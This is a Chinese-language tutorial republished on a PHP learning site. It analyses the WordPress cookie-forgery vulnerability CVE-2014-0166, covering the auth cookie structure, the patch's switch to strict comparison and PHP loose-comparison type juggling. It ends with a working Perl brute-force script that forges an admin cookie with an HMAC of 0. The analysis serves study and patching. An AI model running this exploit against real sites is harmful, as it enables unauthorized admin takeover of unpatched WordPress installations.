来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 0times;00前言本文分析的是wordpress3 8 2更新修复的cookie伪造漏洞( CVE -2014- 0166 ),并给出对应exp。根据描述WordPress before 3 7 2 and 3 8 x before 3 8 2 都是受影响的,本地安装wordpre...
0×00前言 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7Ca09bad0632c45f7295835bcc22f50ba7; wp-settings-time-1=1398577578
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1398748782%7C404207f08e7a5f32dcabad2969d6ee28; 为认证cookie 其他cookie可有可无, 我们分析下这个cookie的结构 C:\AppServ\www\wordpress\wp-includes\default-constants.php (1 hit)
Line 168: define('COOKIEHASH', md5($siteurl)
3 我的siteurl为 http://localhost/wordpress
Md5后为BBFA5B726C6B7A9CF3CDA9370BE3EE91 再看这个cookie的值 格式为$username|$expiration|$hmac $username 为用户名 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); if ( $hmac != $hash ) { do_action('auth_cookie_bad_hash', $cookie_elements); return false; } $username,expiration从cookie中取得 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); echo '$username:'.$username."<br>"; echo '$pass_frag:'.$pass_frag."<br>"; echo '$expiration:'.$expiration."<br>"; echo '$scheme:'.$scheme."<br>"; echo '$key:'.$key."<br>"; echo '$hash:'.$hash."<br>"; echo '$hmac:'.$hmac."<br>"; exit(); if ( $hmac != $hash ) { do_action('auth_cookie_bad_hash', $cookie_elements); return false; }
$username:admin $pass_frag:XBxI $expiration:1398748782 $scheme:auth $key:1002e6cddd0416ac265378aa4ab111f8 $hash:404207f08e7a5f32dcabad2969d6ee28 $hmac:404207f08e7a5f32dcabad2969d6ee28 我们的分析是正确的! $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme); $hash = hash_hmac('md5', $username . '|' . $expiration, $key); - if ( $hmac != $hash ) { + if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) { 将!=修改成!== $a==$b;// Equal TRUE if $a is equal to $b.
$a===$b;// Identical TRUE if $a is equal to $b, and they are of the same type
php手册说明如上
==为非严格比较,会进行类型转换后比对 <?php var_dump(0 == "a"); // 0 == 0 -> true var_dump("1" == "01"); // 1 == 1 -> true var_dump("10" == "1e1"); // 10 == 10 -> true var_dump(100 == "1e2"); // 100 == 100 -> true ?> 以上是手册给出的例子 这个认证cookie中,我们若固定$username的值不变,$hmac固定为0,不断更改$expiration的值,使得 的值不断改变 Crak.pl use LWP::UserAgent; $url="http://localhost/wordpress"; #要攻击的wordpress地址 $sitehash="bbfa5b726c6b7a9cf3cda9370be3ee91"; #$url的md5值 for($i=10000000000;;$i++) #$expiration { my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new('GET' => $url."/wp-admin/"); $req->header('Cookie' => "wordpress_".$sitehash."=admin%7c".$i."%7c0;"); #将cookie设成我们想要的情况 my $res = $ua->request($req); print "wordpress_".$sitehash."=admin%7c".$i."%7c0"."\n"; #将cookie的值打印出来看看 print $i."\t"; print $url."/wp-admin/"."\n"; print $res->status_line."\n"; if(index($res->content,"您好,admin")>0) #如果成功进入后台则记录在D盘下的result.html文件 { open(SH, ">> d:/result.html"); print SH ($i."\n"); } }
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com